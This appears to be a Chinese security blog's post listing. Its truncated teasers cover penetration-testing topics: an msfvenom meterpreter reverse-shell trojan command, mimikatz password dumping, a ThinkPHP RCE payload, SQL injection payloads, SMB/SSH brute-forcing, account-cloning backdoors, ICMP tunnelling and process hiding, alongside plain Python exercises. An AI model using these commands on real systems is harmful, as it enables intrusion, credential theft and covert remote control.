- 博客(28)
- 资源 (2)
- 收藏
- 关注
RSS订阅原创 windows忘了密码以及后渗透读取密码
windows内存读取使用quarkspwdump也可有获得使用mimikatz也可以破解privilege::debugsekurlsa::logonpasswords拿到hash并且给出了密码
2020-03-31 17:00:23
356
原创 爆破445端口和22端口拿shell
工具hydua、nmap使用nmap扫描是否开启smb服务即445端口发现开启,制作字典passwd.txt使用v
2020-03-31 12:48:33
4376
1
原创 2020-3-28_奇安信面试题
此面试为渗透测试工程师的面试,题型为单选题、多选题的简答题。内容说难也难,说简单也简单。你遇到过就简单了。№1:网络中广泛的加密:答案:端对端的加密№2:cobale strike的端口:答案:50050№3:Linux的文件权限中第四位的权限代表:二三四 位代表文件所有者(user)拥有的权限,五六七 位代表组群(group)拥有的权限,八九十 位代表其他人(other)拥有...
2020-03-30 09:11:28
2582
原创 清晰明了的Wireshark基础过滤规则
Wireshark过滤规则那么多,了解这几个,基本也就够用。不够我们再查也不错。了解几个名词:src和dst是源和目的№.1过滤ip:ip.src==127.0.0.1ip.dst==127.0.0.1№.2过滤端口:tcp.port==80tcp.srcport==80tcp.dstport==80№.3协议过滤:直接写协议名称http№.4http模式过滤:...
2020-03-28 08:42:54
141
原创 SQL注入十个爆错函数把网站送到家
No. 1当选No. 1的是extractvalue(),简单粗暴易懂。extractvalue本意是提取值,在英文当中视乎是分开的extra value指额外价值,意思也差不多。根据翻译过来就可知道它是用来查询的。那它提取什么值?提取的是xml中的字符串,啥是xml?一脸懵逼。xml就是标记语言,而HTML就是超文本标记语言,也就是来提取HTML的标签的。啥使HTML标签?你打开网页,右击查看...
2020-03-27 16:52:51
447
原创 SMB远程代码执行_可以把你打蓝屏
SMB的CVE-2020-0796,相当于永恒之蓝,当对win10也起作用,赶紧做好防御!漏洞版本:Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows ...
2020-03-26 09:53:40
621
原创 三个骰子猜大小
用python写三个骰子猜大小import randomdef roll_dice(numbers=3, points=None): print('<<<<< ROLL THE DICE! >>>>>') if points is None: points = [] while numbers ...
2020-03-22 19:20:10
4816
原创 bugkuCTF_sql2
详细的记录一次bugkuCTF上的sql2无论正确与否都不sql语法报错立马想到使用盲注,提示非法字符发现‘=’可通过,用两边的空相等为真拿控制位置’=(0)=’判断出密码为32位,空格被过滤,使用payload'=(select(1)from(admin)where(length(passwd)=32))='判断最后一位字符为0,payload:'=(select...
2020-03-22 18:27:34
225
原创 隐藏通信隧道之ICMPSH
内网渗透_建立icmp隧道-t host :要向其发送ping请求的主机ip地址。此选项是必需的!-r:发送一个包含字符串“Test1234”的测试icmp请求,然后退出。这是用来测试连接的。-d milliseconds:请求之间的延迟(毫秒)-o milliseconds:毫秒响应超时(毫秒)。如果没有及时收到回复,奴隶将增加一个空白计数器。如果计数器达到某个限制,则从机将退出。如果收...
2020-03-22 08:35:07
743
3
原创 留后门_克隆来宾
查看guest的权限,是否可以远程登陆(毋庸置疑是不可能的)登陆远程服务器,修改administer和guest的注册表当你打开注册表regedit,发现SAM是打不开的需要做如下修改,点击权限按照如下的图示重新打开就看到了找到这个位置看到Guest的值对应Users上面的000001F4然后将管理员的f值复制到Guest中然后再导入注册表使用win2013...
2020-03-20 17:47:01
167
1
原创 九九乘法表还有你不知道的秘密
用python写九九乘法表,起初代码是这样:for i in range(1,10): for a in range(1,10): if i>=a: print (a,'*',i,'=',i*a,end=' ') #取消换行,以空格结尾 print()打印出来,总觉得这个位置不好看,没对齐想了一下,终于for i in ...
2020-03-19 22:18:01
285
原创 谷歌火狐浏览器主页被劫持
唉,不听网页卫士迈克菲® 联网顾问的提示,为了找激活win10的工具,访问了一些危险的网站,风雨工具、HEU_KMS什么的,搞得我360卫视查出了2个木马,但是访问的浏览器的主页被修改,一打开就是hao123网页。抓了一下包简单的分析了一下发现他不是立马跳转到hao123的主页,而是先访问了wangzhil.dhtz333.top,我勒个去,这什么鬼。然后还先jump=0再jump=1,跳到...
2020-03-18 16:42:17
752
原创 再现杰奇网站漏洞环境的三道问题
1.第二项:修改后缀2.key值在根目录下:key{fd12bd78}3.找了n久,也没找到路径,还是靠猜出来密码:admin
2020-03-16 17:46:31
340
原创 XCTF中高阶web的php_rce
payload为/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27解析:1.当$name以反斜线开始时会直接将其作为类的命名空间路径。2....
2020-03-14 15:32:05
223
原创 学习bash脚本-suid
suid,guid。以suid为例,如果一个A用户设置了suid的特殊权限的可执行文件,那么如果有另一个B用户来执行这个文件,那么B就拥有A的身份,执行完并结束身份。赋予权限必须要有执行权限才可为s即才拥有特殊权限应用场景:假如我管理着几个大型的数据库系统,而对它们进行备份需要有系统管理权限。我写了几个脚本,并设置了它们的 g u i d,这样我指定的一些用户只要执行这些脚本就能够完成相应的...
2020-03-13 12:26:34
245
原创 python3下输入一个大于2的自然数,然后输出小于该数字的所有素数组成的列表
编写程序,输入一个大于2的自然数,然后输出小于该数字的所有素数组成的列表。def Prime(n): for i in range(2,n): if n%i==0: return False return True n=int(input('请输入一个大于 2 的自然数:\n'))result=list()for i in rang...
2020-03-12 17:03:01
16377
原创 收集子域名的好工具
前言:许她花田半亩列出几个比较好用的工具1.谷歌:site:域名2.网站:爱站:IP反查域名:https://dns.aizhan.com/dnsdumpster:给出地理位置及图形和子域名:https://dnsdumpster.com/phpinfo:子域名爆破:https://phpinfo.me/domain/3.工具:kali下: - Maltego:图形化 ...
2020-03-12 11:24:33
1150
原创 普通用户也可编辑passwd和shadow
前言:我把梦写一写0x00_实验准备虚拟机:Ubuntu 4.15.0先取消竞态条件攻击的保护,及创建工作目录seedecho 0 > /proc/sys/fs/protected_symlinksmkdir seed在 /home/hack/seed 下新建 vulp.c 文件:/* vulp.c */#include <stdio.h>#include...
2020-03-11 15:10:34
346
原创 PowerShell当之无愧的新安全工具
PowerShell-得力安全测试工具 --只给小白看,大佬别路过介绍:Windows powershell是一种命令行外壳程序后和脚本环境。注:命令行外壳程序:是命令行界面的解析器Windows针对版本:win7/win2008:2.0win8/win2012:3.0win8.1/win2012 r2:4.0win7、win2008、win8、win...
2020-03-10 08:36:15
155
原创 burp激活
先不运行burp1,先双击 Keygen 运行2,修改任意 License Text 的值,与之前不一样3,改好之后,点击 Run 即可启动 BurpSuite 的主程序。4,将 Keygen 中 Lisense 里的字符串复制到 BurpSuite Professional 的 Enter license key 中,点击下一步.5,点击 Manual activation....
2020-03-08 22:05:23
4224
原创 msf之使用震网三代来提权
cve_2017_8464_lnk_lpe,他就是震网三代的exploit上次没有成功将x64的搞定,现在搬来了震网三代看我来个远程执行漏洞的提权前面已经拿到shell,但没有system权限我也是稍微找了以下exploit,真是大海捞针偶然发现use exploit/windows/local/cve_2017_8464_lnk_lpe设置好sessions,直接把权限提到...
2020-03-07 18:29:46
323
1
原创 msf之提权操作
愿疫情早日结束,重返校园奋斗使用getsystem来获得最高权限getsystem发现却爆出这样的错误[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:[-] Named Pipe Impersonation (In Memory...
2020-03-07 17:57:11
2542
原创 msf之制作木马进行远程控制
msfvenom制作木马msfvenom -a x64 --platform windows -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.176.129 LPORT=4444 -b"\x00" -f exe > msf.exemsf设置监听use exploit/multi/handler设置payloadset ...
2020-03-07 16:44:38
3739
1
原创 python_提取列表中的偶数,并按降序排列的程序
最初的代码:print ("这是一个输出新列表中只包含原列表中的偶数,并按降序排列的程序!")l = list(map(int,input("请输入包含偶数的一串数字,并以空格分开:").split()))num = []for n in l: if n % 2 == 0: num.append(n)numbers = sorted(num, reverse=Tr...
2020-03-04 21:33:45
9871
原创 SQL注入之报错注入
0x00_报错注入原理构造报错payload让信息通过报错信息回显出来。在查询不回现内容,会答应错误信息。Update、insert等语句,会打印错误信息。0x01_报错注入操作floor()报错注入mysql模板:concat:连接字符串功能floor:去整数值rand:取0~1之间的随机浮点值group by:根据一个或多个列对结果集进行分组并有排序功能select coun...
2020-03-03 21:24:17
1236
原创 最新kali安装tor_外网走起
出现“有未能满足的依赖关系。请尝试不指明软件包的名字来运行“apt --fix-broken install”(也可以指定一个解决办法)。”解决方案:sudo apt --fix-broken install -y再执行sudo apt update && sudo apt full-upgrade -ysudo apt install tor -y...
2020-03-03 09:38:34
9405
6
原创 SQL之Union查询注入
0x00_简介Union操作符是用于合并两个或者多个select语句的搜索结果集。在sql注入攻击中,要使union成功执行,必须要满足四个条件:1、与内部数据库具有相同的字段数。2、列是相同的数据类型。3、select语句中的顺序必须相同。4、当前页面有回显点。0x01_Union注入一般步骤order by 判断字段查看回显数据位置读库信息读表信息读字段读数据0...
2020-03-03 00:53:26
666
原创 黑客之隐藏程序 - ProcessHider
0x00_简介简单介绍一下ProcessHider,它是一款可以隐藏程序进程的软件,将进程隐藏在任务管理器和Process Explorer等监视工具中,从而防止管理员发现有效负载的进程。在windows下运行。下载链接https://github.com/M00nRise/ProcessHider0x01_格式ProcessHider -i PID -n "进程名" -x "cmd.ex...
2020-03-02 14:25:01
1806
metasploit使用手册.xmind
2020-10-16
网络安全思维导图.rar
2020-02-21
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人